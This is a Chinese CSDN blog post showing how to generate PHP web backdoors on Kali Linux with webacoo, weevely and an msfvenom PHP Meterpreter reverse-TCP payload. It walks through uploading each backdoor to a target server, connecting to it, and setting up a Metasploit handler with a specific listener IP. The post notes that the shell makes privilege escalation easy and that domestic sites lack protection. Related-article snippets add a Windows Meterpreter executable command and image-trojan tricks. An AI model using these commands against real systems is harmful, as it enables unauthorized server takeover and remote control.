kali下生成web端后门

最新推荐文章于 2023-09-02 10:44:01 发布
最新推荐文章于 2023-09-02 10:44:01 发布
阅读量801 收藏 3
点赞数
文章标签: php shell 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34397291/article/details/85065291
版权

  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。

 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:


1.webacoo后门

webacoo  -g -o test.php

-g 制作后门代码

-o 输出生成指定的后门程序文件名

wKioL1Zli82gQMVfAAAu6riv1A0061.png

把web后门上传到目标服务器后

使用kali linux访问如下

webacoo -t -u http://www.xx.com/test.php

注意:上传的路径一定要正确

最后退出的时候使用exit退出



2.weevely

查看帮助信息

wKioL1Zli8-BvBjMAAAk1biLZUM186.png


生成后门

下列命令可以生产混搅PHP backdoor , 密码password 后门名字disaplay.php


weevely generate password disaplay.php


wKioL1Zli9CTIbX0AAAzLMyt8MA048.png


把后门文件上传到服务器后,如下命令可以成功访问

weevely http://www.xxx.com/disaplay.php password

通过help看到weevely有很多的module

.net.ifaces 查看服务器的端口信息

.net.scan 202.205.xx.xx 22   对服务器某个端口扫描



3.PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload,可创建具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以制作PHP Meterpreter,命令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己监听的IP -f raw > php_meter.php

-p 设置payload

-f 设置输出文件格式

wKioL1Zli8-QE6pRAAAcwP6E-4M289.png


wKiom1Zli2DRN9KlAAAl3u1nWKs170.png


但是使用前需要注意生成文件的第一行被注释了,所以需要把注释去掉才能使用

把webshell上传到目标服务器,本地监听打开如下:

启动msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162


wKiom1Zli1_xIK6FAAAtU0mx_E0849.png


然后我们就可以使用kali的metasploit功能对目标服务器进行一系列操作。



这种WEBSHELL 利用起来相当方便,输入shell命令之后,就可以随便提权什么的了.
1,国内的貌似没有防护这块的,国内大多只防护GET POST COOKIE这些数据.
2,缺点是如果服务器在DMZ,则失效.
3,more what .....   这种shell如果被利用多了,肯定会有硬件厂商去做防护的.

weixin_34397291
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 547
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门
Fly_鹏程万里
05-16 1727
WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户和服务器实现执行代码的网页终WeBaCoo有两种工作模式:Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payloadTerminal(终模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被...
kali系统中使用weevely创建木马(合并成图片木马)
qq_44635376的博客
01-29 6792
这里写目录标题weevely:kali中的军刀图片木马 weevely:kali中的军刀 创建木马: weevely generate <password> filename.php 连接木马: weevely [url] <password> 图片木马 windows环境制作木马之copy命令 copy image.png/b + muma.php picmuma.png linux环境制作木马之cat命令 cat image.png muma.php > picmum
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4040
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 729
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell
Mastering Kali Linux for Web Penetration Testing mobi
09-27
Mastering Kali Linux for Web Penetration Testing 英文mobi 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Kali Linux Web Penetration Testing Cookbook
最新发布
05-16
Kali Linux Web Penetration Testing Cookbook》是一本专注于利用Kali Linux进行Web渗透测试的实用指南。这本书旨在帮助读者深入理解Web应用的安全性,并提供了一系列针对Web应用漏洞的探测、利用和修复方法。 ...
Kali Linux Web 渗透测试秘籍
09-26
Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍 Kali Linux Web 渗透测试秘籍
weevely工具使用
淡巴枯的博客
05-23 6525
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
Metasploit - crack chinese caidao php backdoor
Nixawk
10-24 2837
Chopper Backdoor Client function set_action(){     // chopper_pwd  ---- Be used to set the input value // chopper_pass ---- PASSWORD to access the backdoor. // chopper_form ---- FORM to post t
KALI 菜刀weevely基本操作和使用(超级详细图解)
WHOAMI的博客
12-31 5558
KALI 菜刀weevely基本操作和使用(超级详细图解) 本人作为一个工具DOG(可能连工具dog都吧自己说牛了),个人认为在WIN下,中国菜刀还是很强大的。但是KALI中也有类似中国菜刀的工具 ——weevely**,这里给本人记录一下,也请大佬们请多多指点……多说无用,直接上菜儿,基本用法步骤如下:** 0x01 首先,KALI准备开始搞事; 0x02 在KALI 键入命令 weevely 打开工具;(哈哈,我的是4.0.1,别笑话我啊!) 》》》weevely 0x03 发现
图片马的制作以及菜刀的使用
weixin_33774308的博客
12-05 6218
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析 图片马是WEB渗透测...
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3380
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
Weevely——PHP木马文件生成
随缘......~|-_-|~
10-08 361
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1918
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
MSF后门生成模块 面试考题
安全界的彭于晏的博客
06-24 284
1. 后门生成模块的作用是什么? 维持访问,持续控制 2. MsFvenom支持生成的脚本有哪些? 使用命令:MsFvenom -l formats查看支持的脚本列表 3. 如何查看msfvenom支持的payload? 使用命令:msfvenom -l payloads查看支持的payload 4. 如何查看msfvenom支持的编码器? 使用命令:msfvenom -l encoders查看支持的所有编码器 5. Msfvenom -b 参数的作用是什么? 删除生成sh
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3084
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值